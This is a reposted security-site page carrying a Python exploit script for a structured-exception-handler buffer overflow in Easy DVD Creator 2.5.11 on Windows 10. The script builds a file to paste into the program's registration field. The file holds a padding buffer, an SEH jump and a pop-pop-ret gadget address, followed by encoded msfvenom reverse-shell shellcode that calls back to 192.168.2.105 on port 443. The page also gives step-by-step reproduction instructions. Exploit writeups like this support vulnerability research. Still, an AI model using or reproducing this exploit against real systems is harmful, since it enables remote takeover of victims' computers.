Easy DVD Creator 2.5.11 - Buffer Overflow (SEH)
|
来源:vfocus.net 作者:tr0ubl3m4k3r 发布时间:2017-08-29
|
|
#!/usr/bin/python ############################################################################### # Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH) # Date: 26-08-2017 # Exploit Author: tr0ubl3m4k3r # Vulnerable Software: Easy DVD Creator # Vendor Homepage: http://www.divxtodvd.net/ # Version: 2.5.11 # Software Link: http://www.divxtodvd.net/easy_dvd_creator.exe # Tested On: Windows 10 64bit # # Credit to Muhann4d for discovering the PoC (41911). # # To reproduce the exploit: # 1. Click Register # 2. In the "Enter User Name" field, paste the content of exploit.txt # ############################################################################## buffer = "\x41" * 988 nSEH = "\xeb\x09\x90\x90" # 0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files (x86)\Easy MOV Converter\SkinMagic.dll) SEH = "\x59\x78\x03\x10" junk = "\x90"*16 # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443 # -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" "\x52\x83\xc2\x04\x31\x7a\x13\x03\xad\xeb\xd7\x60\xad\xe4\x9a" "\x8b\x4d\xf5\xfa\x02\xa8\xc4\x3a\x70\xb9\x77\x8b\xf2\xef\x7b" "\x60\x56\x1b\x0f\x04\x7f\x2c\xb8\xa3\x59\x03\x39\x9f\x9a\x02" "\xb9\xe2\xce\xe4\x80\x2c\x03\xe5\xc5\x51\xee\xb7\x9e\x1e\x5d" "\x27\xaa\x6b\x5e\xcc\xe0\x7a\xe6\x31\xb0\x7d\xc7\xe4\xca\x27" "\xc7\x07\x1e\x5c\x4e\x1f\x43\x59\x18\x94\xb7\x15\x9b\x7c\x86" "\xd6\x30\x41\x26\x25\x48\x86\x81\xd6\x3f\xfe\xf1\x6b\x38\xc5" "\x88\xb7\xcd\xdd\x2b\x33\x75\x39\xcd\x90\xe0\xca\xc1\x5d\x66" "\x94\xc5\x60\xab\xaf\xf2\xe9\x4a\x7f\x73\xa9\x68\x5b\xdf\x69" "\x10\xfa\x85\xdc\x2d\x1c\x66\x80\x8b\x57\x8b\xd5\xa1\x3a\xc4" "\x1a\x88\xc4\x14\x35\x9b\xb7\x26\x9a\x37\x5f\x0b\x53\x9e\x98" "\x6c\x4e\x66\x36\x93\x71\x97\x1f\x50\x25\xc7\x37\x71\x46\x8c" "\xc7\x7e\x93\x03\x97\xd0\x4c\xe4\x47\x91\x3c\x8c\x8d\x1e\x62" "\xac\xae\xf4\x0b\x47\x55\x9f\xf3\x30\x57\x36\x9c\x42\x57\xc9" "\xe7\xca\xb1\xa3\x07\x9b\x6a\x5c\xb1\x86\xe0\xfd\x3e\x1d\x8d" "\x3e\xb4\x92\x72\xf0\x3d\xde\x60\x65\xce\x95\xda\x20\xd1\x03" "\x72\xae\x40\xc8\x82\xb9\x78\x47\xd5\xee\x4f\x9e\xb3\x02\xe9" "\x08\xa1\xde\x6f\x72\x61\x05\x4c\x7d\x68\xc8\xe8\x59\x7a\x14" "\xf0\xe5\x2e\xc8\xa7\xb3\x98\xae\x11\x72\x72\x79\xcd\xdc\x12" "\xfc\x3d\xdf\x64\x01\x68\xa9\x88\xb0\xc5\xec\xb7\x7d\x82\xf8" "\xc0\x63\x32\x06\x1b\x20\x42\x4d\x01\x01\xcb\x08\xd0\x13\x96" "\xaa\x0f\x57\xaf\x28\xa5\x28\x54\x30\xcc\x2d\x10\xf6\x3d\x5c" "\x09\x93\x41\xf3\x2a\xb6") padding = "\x44"*(1000-351) f = open ("exploit.txt", "w") f.write(buffer + nSEH + SEH + junk + shellcode + padding) f.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|